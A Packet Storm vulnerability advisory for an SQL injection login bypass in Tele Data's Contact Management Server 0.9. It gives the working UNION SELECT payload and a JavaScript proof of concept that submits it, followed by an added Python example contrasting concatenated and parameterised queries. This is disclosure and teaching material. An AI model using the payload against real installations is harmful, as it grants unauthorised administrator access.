Tele Data's CMS 0.9 SQL Injection

2010-04-28T00:00:00
ID PACKETSTORM:89023
Type packetstorm
Reporter AutoSec Tools
Modified 2010-04-28T00:00:00

Description

                                        
                                            `|=================================================================================================|  
| |  
| Vulnerability............SQL Injection |  
| Software.................Tele Data's Contact Management Server 0.9 |  
| Download.................http://teledata.qc.ca/td_cms/TD_CMS_SETUPEX.exe |  
| Date.....................4/28/10 |  
| |  
|=================================================================================================|  
| |  
| Site.....................http://cross-site-scripting.blogspot.com/ |  
| Email....................john.leitch5@gmail.com |  
| |  
|=================================================================================================|  
|  
| ##Description##  
|  
| There isn't much in the way of security here. It's possible to log in with admin privileges by  
| injecting SQL into the username field. As there are client-side length constraints in place for  
| the username field, I packaged the exploit in some JavaScript for ease of use.  
|  
|  
| ##Exploit##   
|  
| ' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--  
|  
|  
| ##Proof of Concept##   
|  
| javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();  
|  
|=================================================================================================|  
`
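
The flaw described above, reproduced against a constructed SQLite table as an added example (not code from the advisory or from Tele Data's product). The table layout, the fetch-then-compare login logic, `MAX_USERNAME` and all function names are assumptions, and the table's width is sized to the payload's column list because the real schema is not given. It contrasts a concatenated query with a bound parameter plus a server-side length check.

```python
import sqlite3

# Payload copied verbatim from the advisory's Exploit section.
PAYLOAD = (
    "' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,"
    "2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--"
)
MAX_USERNAME = 32  # assumed limit; the advisory does not state the real one


def make_db():
    """Constructed Users table, as wide as the payload's select list."""
    width = PAYLOAD.count(",") + 1
    filler = ", ".join(f"f{i} INTEGER DEFAULT 0" for i in range(4, width))
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.execute("CREATE TABLE Users (RecID INTEGER, Username TEXT, "
               f"Password TEXT, Level INTEGER, {filler})")
    db.execute("INSERT INTO Users (RecID, Username, Password, Level) "
               "VALUES (7, 'alice', 's3cret', 0)")
    return db


def _check(row, password):
    # Assumed application logic: fetch the row, then compare the password.
    # Plaintext comparison only mirrors the flaw; real code verifies a salted hash.
    if row is not None and row["Password"] == password:
        return row["RecID"]
    return None


def login_vulnerable(db, username, password):
    # The username is concatenated in, so a quote inside it becomes SQL syntax.
    sql = "SELECT * FROM Users WHERE Username = '" + username + "'"
    return _check(db.execute(sql).fetchone(), password)


def login_hardened(db, username, password, max_len=MAX_USERNAME):
    # Length is enforced on the server; the browser-side limit is advisory only.
    if not 0 < len(username) <= max_len:
        return None
    # Bound parameter: the value is compared as data and never parsed as SQL.
    sql = "SELECT * FROM Users WHERE Username = ?"
    return _check(db.execute(sql, (username,)).fetchone(), password)
```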